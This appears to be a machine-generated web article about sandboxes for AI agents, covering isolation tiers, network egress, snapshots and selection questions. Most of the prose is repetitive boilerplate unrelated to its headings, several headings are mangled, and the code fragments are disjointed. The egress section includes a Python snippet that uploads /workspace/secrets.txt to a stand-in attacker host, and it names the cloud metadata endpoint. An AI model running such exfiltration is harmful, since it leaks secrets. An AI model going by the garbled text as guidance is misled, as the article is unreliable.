Home / Articles / Practical notes: 5 Things Every AI Engineer Should Know About Agent Sandboxes

This article is published in English.

Practical notes: 5 Things Every AI Engineer Should Know About Agent Sandboxes

Operable walkthrough of Practical notes: 5 Things Every AI Engineer Should Know About Agent Sandboxes: contracts, checks, and drop-in code slots for teams shipping this pattern.

2982 words

The following notes reconstruct a practical path around “5 Things Every AI Engineer Should Know About Agent Sandboxes”. Emphasis stays on contracts, checks, and drop-in code placeholders rather than motivational framing. When working through the Overview stage, write down the contract first: required inputs, success signal, and what happens on partial failure. That checklist keeps later code changes honest. Treat this stage as a contract between inputs and validated outputs. Name the artifacts, define success checks, and refuse silent partial completion.

Think → Execute → Wait → Think → Execute → Wait

1. Cold-start numbers rarely represent a real agent

The 1 Cold-start numbers rarely stage works best when treated as a measurable surface. Capture one golden transcript, one failure case, and the rollback note before expanding scope. Record timings and token or query cost next to functional results. Cost visibility early prevents surprise bills when the path moves from demo to shared environments. Keep graph state flat and typed. Nested blobs hide which node wrote which field and break resume after interrupts.

Python
Node.js
npm packages
Python packages
environment variables
filesystem mounts
networking
data-science libraries
browser automation
Git
compilers

The empty-loop benchmark

The The empty-loop benchmark stage works best when treated as a measurable surface. Capture one golden transcript, one failure case, and the rollback note before expanding scope. Keep configuration outside application code. Environment files, secret stores, and feature flags belong in one place operators can audit without reading the whole graph. Keep graph state flat and typed. Nested blobs hide which node wrote which field and break resume after interrupts.

time ./start-minimal-vm
150 ms
import pandas as pd
import numpy as np
import requests
data = pd.read_csv("dataset.csv")
print(data.describe())
print(2 + 2)

Why agents make this worse

The Why agents make this stage works best when treated as a measurable surface. Capture one golden transcript, one failure case, and the rollback note before expanding scope. Document the happy path and the recovery path together. Retries, human gates, and dead-letter handling are part of the product, not later polish. Keep graph state flat and typed. Nested blobs hide which node wrote which field and break resume after interrupts. The Why agents make this stage works best when treated as a measurable surface. Capture one golden transcript, one failure case, and the rollback note before expanding scope. Treat this stage as a contract between inputs and validated outputs. Name the artifacts, define success checks, and refuse silent partial completion.

Agent
  ↓
Create sandbox
  ↓
Initialize runtime
  ↓
Run command
  ↓
Destroy sandbox
Agent
  ↓
Create sandbox
  ↓
Initialize runtime
  ↓
Run command
  ↓
Destroy sandbox

The better architecture: warm sandboxes

For the The better architecture warm stage, define the inputs, the owner of the step, and the exit criteria before changing code. Operators should be able to re-run the step from a known checkpoint without guessing hidden state. Record timings and token or query cost next to functional results. Cost visibility early prevents surprise bills when the path moves from demo to shared environments. Put human approval on edges that spend money or change production data. Compile-time wiring does not equal business completeness.

┌── Warm Worker
Agent ───────────┼── Warm Worker
                 ├── Warm Worker
                 └── Warm Worker

What you should measure

For the What you should measure stage, define the inputs, the owner of the step, and the exit criteria before changing code. Operators should be able to re-run the step from a known checkpoint without guessing hidden state. Keep configuration outside application code. Environment files, secret stores, and feature flags belong in one place operators can audit without reading the whole graph. Put human approval on edges that spend money or change production data. Compile-time wiring does not equal business completeness.

"How quickly can Linux boot?"
Agent request
    ↓
Sandbox allocation
    ↓
Filesystem ready
    ↓
Runtime ready
    ↓
Dependencies ready
    ↓
Network ready
    ↓
First command executed

2. Sandbox security depends on what you share with your neighbor

For the 2 Sandbox security depends stage, define the inputs, the owner of the step, and the exit criteria before changing code. Operators should be able to re-run the step from a known checkpoint without guessing hidden state. Document the happy path and the recovery path together. Retries, human gates, and dead-letter handling are part of the product, not later polish. Put human approval on edges that spend money or change production data. Compile-time wiring does not equal business completeness. For the 2 Sandbox security depends stage, define the inputs, the owner of the step, and the exit criteria before changing code. Operators should be able to re-run the step from a known checkpoint without guessing hidden state. Treat this stage as a contract between inputs and validated outputs. Name the artifacts, define success checks, and refuse silent partial completion.

python generated_code.py
Host Linux Kernel
       │
 ┌─────┴─────┐
 │           │
Agent A    Agent B
Container  Container

The sandbox isolation spectrum

When working through the The sandbox isolation spectrum stage, write down the contract first: required inputs, success signal, and what happens on partial failure. That checklist keeps later code changes honest. Record timings and token or query cost next to functional results. Cost visibility early prevents surprise bills when the path moves from demo to shared environments. Checkpoint after expensive steps. Resume should not re-bill the same LLM call when an operator retries a later node.

Tier 1: V8 Isolates and WebAssembly

When working through the Tier 1 V8 Isolates stage, write down the contract first: required inputs, success signal, and what happens on partial failure. That checklist keeps later code changes honest. Keep configuration outside application code. Environment files, secret stores, and feature flags belong in one place operators can audit without reading the whole graph. Checkpoint after expensive steps. Resume should not re-bill the same LLM call when an operator retries a later node.

~milliseconds
gcc main.c
return userInput.toUpperCase();

Tier 2: Standard OCI containers

When working through the Tier 2 Standard OCI stage, write down the contract first: required inputs, success signal, and what happens on partial failure. That checklist keeps later code changes honest. Document the happy path and the recovery path together. Retries, human gates, and dead-letter handling are part of the product, not later polish. Checkpoint after expensive steps. Resume should not re-bill the same LLM call when an operator retries a later node. When working through the Tier 2 Standard OCI stage, write down the contract first: required inputs, success signal, and what happens on partial failure. That checklist keeps later code changes honest. Treat this stage as a contract between inputs and validated outputs. Name the artifacts, define success checks, and refuse silent partial completion.

Docker
containerd
runc
Kubernetes Pods
Process isolation
Filesystem isolation
Resource limits
Network namespaces
python
node
gcc
git
bash

Tier 3: User-space kernels

The Tier 3 User-space kernels stage works best when treated as a measurable surface. Capture one golden transcript, one failure case, and the rollback note before expanding scope. Record timings and token or query cost next to functional results. Cost visibility early prevents surprise bills when the path moves from demo to shared environments. Keep graph state flat and typed. Nested blobs hide which node wrote which field and break resume after interrupts.

Agent
  ↓
Container
  ↓
User-space kernel
  ↓
Host kernel
  ↓
Hardware

Tier 4: MicroVMs

The Tier 4 MicroVMs stage works best when treated as a measurable surface. Capture one golden transcript, one failure case, and the rollback note before expanding scope. Keep configuration outside application code. Environment files, secret stores, and feature flags belong in one place operators can audit without reading the whole graph. Keep graph state flat and typed. Nested blobs hide which node wrote which field and break resume after interrupts.

Agent
  ↓
Guest Linux Kernel
  ↓
Virtual Machine Boundary
  ↓
Host Kernel
  ↓
Hardware

3. Network egress can be more dangerous than the sandbox escape

The 3 Network egress can stage works best when treated as a measurable surface. Capture one golden transcript, one failure case, and the rollback note before expanding scope. Document the happy path and the recovery path together. Retries, human gates, and dead-letter handling are part of the product, not later polish. Keep graph state flat and typed. Nested blobs hide which node wrote which field and break resume after interrupts. The 3 Network egress can stage works best when treated as a measurable surface. Capture one golden transcript, one failure case, and the rollback note before expanding scope. Treat this stage as a contract between inputs and validated outputs. Name the artifacts, define success checks, and refuse silent partial completion.

import requests
requests.post(
    "https://attacker.example.com/upload",
    files={"data": open("/workspace/secrets.txt", "rb")}
)
Read file
   ↓
HTTP request
   ↓
Attacker receives data

The dangerous metadata endpoint

For the The dangerous metadata endpoint stage, define the inputs, the owner of the step, and the exit criteria before changing code. Operators should be able to re-run the step from a known checkpoint without guessing hidden state. Record timings and token or query cost next to functional results. Cost visibility early prevents surprise bills when the path moves from demo to shared environments. Put human approval on edges that spend money or change production data. Compile-time wiring does not equal business completeness.

169.254.169.254

Default deny should be your starting point

For the Default deny should be stage, define the inputs, the owner of the step, and the exit criteria before changing code. Operators should be able to re-run the step from a known checkpoint without guessing hidden state. Keep configuration outside application code. Environment files, secret stores, and feature flags belong in one place operators can audit without reading the whole graph. Put human approval on edges that spend money or change production data. Compile-time wiring does not equal business completeness.

ALLOW INTERNET
DENY ALL

Don’t leak environment variables

For the Don t leak environment stage, define the inputs, the owner of the step, and the exit criteria before changing code. Operators should be able to re-run the step from a known checkpoint without guessing hidden state. Document the happy path and the recovery path together. Retries, human gates, and dead-letter handling are part of the product, not later polish. Put human approval on edges that spend money or change production data. Compile-time wiring does not equal business completeness. For the Don t leak environment stage, define the inputs, the owner of the step, and the exit criteria before changing code. Operators should be able to re-run the step from a known checkpoint without guessing hidden state. Treat this stage as a contract between inputs and validated outputs. Name the artifacts, define success checks, and refuse silent partial completion.

export OPENAI_API_KEY="super-secret-key"
export AWS_SECRET_ACCESS_KEY="..."
export DATABASE_PASSWORD="..."
env

4. State snapshots can matter more than boot time

When working through the 4 State snapshots can stage, write down the contract first: required inputs, success signal, and what happens on partial failure. That checklist keeps later code changes honest. Record timings and token or query cost next to functional results. Cost visibility early prevents surprise bills when the path moves from demo to shared environments. Checkpoint after expensive steps. Resume should not re-bill the same LLM call when an operator retries a later node.

Turn 1
Read repository
Turn 2
Run tests
Turn 3
Tests fail
Turn 4
Edit code
Turn 5
Run tests again
Turn 6
Build application
/workspace
    ├── src/
    ├── package.json
    ├── tests/
    └── node_modules/
Keep VM alive
     ↓
Fast
     ↓
Expensive

Destroy VM
     ↓
Cheap
     ↓
Slow

Enter snapshots

When working through the Enter snapshots stage, write down the contract first: required inputs, success signal, and what happens on partial failure. That checklist keeps later code changes honest. Keep configuration outside application code. Environment files, secret stores, and feature flags belong in one place operators can audit without reading the whole graph. Checkpoint after expensive steps. Resume should not re-bill the same LLM call when an operator retries a later node.

Running Agent
      ↓
Memory + State
      ↓
Snapshot
      ↓
Object Storage
VM pauses
   ↓
Snapshot saved
   ↓
Resources released
Request
   ↓
Restore snapshot
   ↓
Continue execution
Fast resume
+
Persistent state
+
Lower idle cost

5. Use four questions to choose your sandbox

When working through the 5 Use four questions stage, write down the contract first: required inputs, success signal, and what happens on partial failure. That checklist keeps later code changes honest. Document the happy path and the recovery path together. Retries, human gates, and dead-letter handling are part of the product, not later polish. Checkpoint after expensive steps. Resume should not re-bill the same LLM call when an operator retries a later node. When working through the 5 Use four questions stage, write down the contract first: required inputs, success signal, and what happens on partial failure. That checklist keeps later code changes honest. Treat this stage as a contract between inputs and validated outputs. Name the artifacts, define success checks, and refuse silent partial completion.

Question 1: What language does the agent need?

The Question 1 What language stage works best when treated as a measurable surface. Capture one golden transcript, one failure case, and the rollback note before expanding scope. Record timings and token or query cost next to functional results. Cost visibility early prevents surprise bills when the path moves from demo to shared environments. Keep graph state flat and typed. Nested blobs hide which node wrote which field and break resume after interrupts.

const result = calculateSomething(input);
python analysis.py
gcc main.c
git clone ...
npm install ...

Question 2: Is the code trusted?

The Question 2 Is the stage works best when treated as a measurable surface. Capture one golden transcript, one failure case, and the rollback note before expanding scope. Keep configuration outside application code. Environment files, secret stores, and feature flags belong in one place operators can audit without reading the whole graph. Keep graph state flat and typed. Nested blobs hide which node wrote which field and break resume after interrupts.

Internal developer agent

The Internal developer agent stage works best when treated as a measurable surface. Capture one golden transcript, one failure case, and the rollback note before expanding scope. Document the happy path and the recovery path together. Retries, human gates, and dead-letter handling are part of the product, not later polish. Keep graph state flat and typed. Nested blobs hide which node wrote which field and break resume after interrupts. The Internal developer agent stage works best when treated as a measurable surface. Capture one golden transcript, one failure case, and the rollback note before expanding scope. Treat this stage as a contract between inputs and validated outputs. Name the artifacts, define success checks, and refuse silent partial completion.

Developer
   ↓
Agent
   ↓
Hardened container

Public multi-tenant agent

For the Public multi-tenant agent stage, define the inputs, the owner of the step, and the exit criteria before changing code. Operators should be able to re-run the step from a known checkpoint without guessing hidden state. Record timings and token or query cost next to functional results. Cost visibility early prevents surprise bills when the path moves from demo to shared environments. Put human approval on edges that spend money or change production data. Compile-time wiring does not equal business completeness.

User
  ↓
LLM
  ↓
Generated Code
  ↓
Sandbox

Question 3: What does the you/O profile look like?

For the Question 3 What does stage, define the inputs, the owner of the step, and the exit criteria before changing code. Operators should be able to re-run the step from a known checkpoint without guessing hidden state. Keep configuration outside application code. Environment files, secret stores, and feature flags belong in one place operators can audit without reading the whole graph. Put human approval on edges that spend money or change production data. Compile-time wiring does not equal business completeness.

for x in data:
    calculate(x)
fork()
fork()
fork()
read()
write()
open()
close()
network()
network()
network()

Question 4: Do you need a dedicated guest kernel?

For the Question 4 Do you stage, define the inputs, the owner of the step, and the exit criteria before changing code. Operators should be able to re-run the step from a known checkpoint without guessing hidden state. Document the happy path and the recovery path together. Retries, human gates, and dead-letter handling are part of the product, not later polish. Put human approval on edges that spend money or change production data. Compile-time wiring does not equal business completeness. For the Question 4 Do you stage, define the inputs, the owner of the step, and the exit criteria before changing code. Operators should be able to re-run the step from a known checkpoint without guessing hidden state.

Custom kernel modules
Specialized Linux environments
Strong multi-tenant isolation
Hardware-level virtualization boundaries

Operational checklist